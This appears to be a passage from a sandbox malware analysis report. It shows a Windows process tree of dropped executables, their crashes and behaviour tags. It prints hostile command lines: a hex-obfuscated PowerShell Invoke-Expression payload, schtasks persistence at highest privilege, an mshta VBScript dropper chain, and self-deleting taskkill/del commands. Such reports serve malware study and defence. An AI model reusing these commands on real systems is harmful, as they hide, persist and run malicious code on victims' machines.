4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))5⤵PID:11976
-
-
-
-
-
C:\Users\Admin\Documents\A9JW3dOLk22vVdJN78y31mHl.exe"C:\Users\Admin\Documents\A9JW3dOLk22vVdJN78y31mHl.exe"2⤵
- Executes dropped EXE
PID:2268 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4656
-
-
-
C:\Users\Admin\Documents\KSXtGBuDkma5IPEreQEYGo6P.exe"C:\Users\Admin\Documents\KSXtGBuDkma5IPEreQEYGo6P.exe"2⤵
- Executes dropped EXE
PID:3464 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 7363⤵
- Program crash
PID:5980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 7523⤵
- Program crash
PID:5892
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 7123⤵
- Program crash
PID:5272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 7163⤵
- Program crash
PID:6488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 9443⤵
- Program crash
PID:6756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 7963⤵
- Program crash
PID:6772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 12003⤵
- Program crash
PID:2540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 13083⤵
- Program crash
PID:7240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 12723⤵
- Program crash
PID:7652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 13883⤵
- Program crash
PID:8000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 13203⤵
- Program crash
PID:7648
-
-
-
C:\Users\Admin\Documents\hJSd8eo5QbCqayV9NzEiFE9x.exe"C:\Users\Admin\Documents\hJSd8eo5QbCqayV9NzEiFE9x.exe"2⤵
- Executes dropped EXE
PID:1824 -
C:\Users\Admin\Documents\hJSd8eo5QbCqayV9NzEiFE9x.exe"C:\Users\Admin\Documents\hJSd8eo5QbCqayV9NzEiFE9x.exe" -u3⤵PID:5676
-
-
-
C:\Users\Admin\Documents\H77ct3jCq9NSUt6ER6o9C0xz.exe"C:\Users\Admin\Documents\H77ct3jCq9NSUt6ER6o9C0xz.exe"2⤵
- Executes dropped EXE
PID:3160 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 11243⤵
- Program crash
PID:5692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 9963⤵
- Program crash
PID:6560
-
-
-
C:\Users\Admin\Documents\GUzxt52CKE4BsEjzReXXeacK.exe"C:\Users\Admin\Documents\GUzxt52CKE4BsEjzReXXeacK.exe"2⤵
- Executes dropped EXE
PID:3456
-
-
C:\Users\Admin\Documents\UoG69yBdbeyoAcA7BlhpKPCk.exe"C:\Users\Admin\Documents\UoG69yBdbeyoAcA7BlhpKPCk.exe"2⤵
- Executes dropped EXE
PID:3760 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 7683⤵
- Program crash
PID:5972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 8243⤵
- Program crash
PID:5944
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 8483⤵
- Program crash
PID:6280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 8963⤵
- Program crash
PID:7088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 8923⤵
- Program crash
PID:4484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 11003⤵
- Program crash
PID:412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 11403⤵
- Program crash
PID:5640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 13563⤵
- Program crash
PID:8924
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5271105860.exe"3⤵PID:8432
-
C:\Users\Admin\AppData\Local\Temp\5271105860.exe"C:\Users\Admin\AppData\Local\Temp\5271105860.exe"4⤵PID:5192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 7485⤵
- Program crash
PID:9968
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 7645⤵
- Program crash
PID:10184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 7205⤵
- Program crash
PID:10472
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 7485⤵
- Program crash
PID:10612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 9485⤵
- Program crash
PID:8164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 11965⤵
- Program crash
PID:11820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 13045⤵
- Program crash
PID:7648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 12005⤵
- Program crash
PID:11848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 12925⤵
- Program crash
PID:11536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 12645⤵
- Program crash
PID:11960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 13005⤵
- Program crash
PID:5072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 6565⤵
- Program crash
PID:12096
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 11565⤵
- Program crash
PID:12416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 12405⤵
- Program crash
PID:12812
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 17403⤵
- Program crash
PID:9816
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 18443⤵
- Program crash
PID:9320
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2808985642.exe"3⤵PID:10828
-
C:\Users\Admin\AppData\Local\Temp\2808985642.exe"C:\Users\Admin\AppData\Local\Temp\2808985642.exe"4⤵PID:10464
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "UoG69yBdbeyoAcA7BlhpKPCk.exe" /f & erase "C:\Users\Admin\Documents\UoG69yBdbeyoAcA7BlhpKPCk.exe" & exit3⤵PID:5084
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "UoG69yBdbeyoAcA7BlhpKPCk.exe" /f4⤵
- Kills process with taskkill
PID:11620
-
-
-
-
C:\Users\Admin\Documents\e9knWVxHPm_Gfdz1L_KOLKiC.exe"C:\Users\Admin\Documents\e9knWVxHPm_Gfdz1L_KOLKiC.exe"2⤵
- Executes dropped EXE
PID:416 -
C:\Users\Admin\Documents\e9knWVxHPm_Gfdz1L_KOLKiC.exe"C:\Users\Admin\Documents\e9knWVxHPm_Gfdz1L_KOLKiC.exe"3⤵PID:6620
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im e9knWVxHPm_Gfdz1L_KOLKiC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\e9knWVxHPm_Gfdz1L_KOLKiC.exe" & del C:\ProgramData\*.dll & exit4⤵PID:4544
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im e9knWVxHPm_Gfdz1L_KOLKiC.exe /f5⤵
- Kills process with taskkill
PID:9800
-
-
-
-
-
C:\Users\Admin\Documents\2AV3_0GUa0CExcaxg1wRO2NO.exe"C:\Users\Admin\Documents\2AV3_0GUa0CExcaxg1wRO2NO.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3912
-
-
C:\Users\Admin\Documents\dbb5DUcoPeU6SiCXVWFolbhZ.exe"C:\Users\Admin\Documents\dbb5DUcoPeU6SiCXVWFolbhZ.exe"2⤵
- Executes dropped EXE
PID:3424 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im dbb5DUcoPeU6SiCXVWFolbhZ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\dbb5DUcoPeU6SiCXVWFolbhZ.exe" & del C:\ProgramData\*.dll & exit3⤵PID:6040
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbb5DUcoPeU6SiCXVWFolbhZ.exe /f4⤵
- Kills process with taskkill
PID:5096
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:12556
-
-
-
-
C:\Users\Admin\Documents\7XKeu_QmhY7kfMdQz4d91p2P.exe"C:\Users\Admin\Documents\7XKeu_QmhY7kfMdQz4d91p2P.exe"2⤵
- Executes dropped EXE
PID:744 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 6563⤵
- Program crash
PID:5996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 6723⤵
- Program crash
PID:4612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 7123⤵
- Program crash
PID:4760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 8803⤵
- Program crash
PID:6012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 11203⤵
- Program crash
PID:6776
-
-
-
C:\Users\Admin\Documents\5hPoKwa5jgLXjimLYbtW5WTg.exe"C:\Users\Admin\Documents\5hPoKwa5jgLXjimLYbtW5WTg.exe"2⤵
- Executes dropped EXE
PID:3272 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\5hPoKwa5jgLXjimLYbtW5WTg.exe"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF """" == """" for %N In ( ""C:\Users\Admin\Documents\5hPoKwa5jgLXjimLYbtW5WTg.exe"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )3⤵PID:5048
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\5hPoKwa5jgLXjimLYbtW5WTg.exe" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "" == "" for %N In ("C:\Users\Admin\Documents\5hPoKwa5jgLXjimLYbtW5WTg.exe" ) do taskkill -F /Im "%~nXN"4⤵PID:7080
-
C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exEKRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG5⤵PID:5664
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF ""-pA1IQsAATOS0kxrmeOcrgfdjncUG "" == """" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )6⤵PID:508
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "-pA1IQsAATOS0kxrmeOcrgfdjncUG " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" ) do taskkill -F /Im "%~nXN"7⤵PID:4448
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\p_ZPP.J p6⤵PID:5728
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /Im "5hPoKwa5jgLXjimLYbtW5WTg.exe"5⤵
- Kills process with taskkill
PID:4204
-
-
-
-
-
C:\Users\Admin\Documents\VI9yjDwRKJv3Cx451ew9vD6b.exe"C:\Users\Admin\Documents\VI9yjDwRKJv3Cx451ew9vD6b.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3076 -
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵PID:5412
-
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵PID:5376
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"3⤵PID:5340
-
-
-
C:\Users\Admin\Documents\V80Q31fPNGdLW2viJmAxNKUu.exe"C:\Users\Admin\Documents\V80Q31fPNGdLW2viJmAxNKUu.exe"2⤵
- Executes dropped EXE
PID:1388 -
C:\Users\Admin\AppData\Roaming\3846333.exe"C:\Users\Admin\AppData\Roaming\3846333.exe"3⤵PID:5428
-
-
C:\Users\Admin\AppData\Roaming\5024469.exe"C:\Users\Admin\AppData\Roaming\5024469.exe"3⤵PID:4660
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:8012
-
-
-
C:\Users\Admin\AppData\Roaming\6978868.exe"C:\Users\Admin\AppData\Roaming\6978868.exe"3⤵PID:5696
-
-
C:\Users\Admin\AppData\Roaming\1770687.exe"C:\Users\Admin\AppData\Roaming\1770687.exe"3⤵PID:1780
-
-
C:\Users\Admin\AppData\Roaming\6621315.exe"C:\Users\Admin\AppData\Roaming\6621315.exe"3⤵PID:6004
-
-
-
C:\Users\Admin\Documents\lVTo_9MOui5CoPDC4lagnV1O.exe"C:\Users\Admin\Documents\lVTo_9MOui5CoPDC4lagnV1O.exe"2⤵
- Executes dropped EXE
PID:4084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 3843⤵
- Program crash
PID:5988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 3643⤵
- Program crash
PID:2920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 4003⤵
- Program crash
PID:5428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 6203⤵
- Program crash
PID:4760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 6563⤵
- Program crash
PID:3664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 7363⤵
- Program crash
PID:6860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 8483⤵
- Program crash
PID:3696
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 7363⤵
- Program crash
PID:10496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 6923⤵
- Program crash
PID:7080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 6203⤵
- Program crash
PID:15552
-
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe"C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe"2⤵
- Executes dropped EXE
PID:3904 -
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:5024
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:4212
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:900
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:5252
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:5664
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:4768
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:4932
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:4840
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:5952
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:4364
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:4904
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:3232
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:6332
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:6896
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:4872
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:6964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6964 -s 244⤵
- Program crash
PID:4560
-
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:4944
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:4880
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:5340
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:6220
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:4572
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:7432
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:7716
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:8064
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:7596
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:7304
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:7832
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:7900
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:7604
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:6700
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:8420
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:8816
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:9208
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:8924
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:2232
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:3712
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:9324
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:9632
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:9968
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:9196
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:9500
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:9748
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:5676
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:8104
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:5676
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:8108
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:10260
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:10604
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:11052
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:10564
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:10816
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:10404
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:11220
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:10748
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:7304
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:11304
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:11600
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:12080
-
-
C:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exeC:\Users\Admin\Documents\rjhIupatZBhIU5AiYzbG8InV.exe3⤵PID:11508
-
-
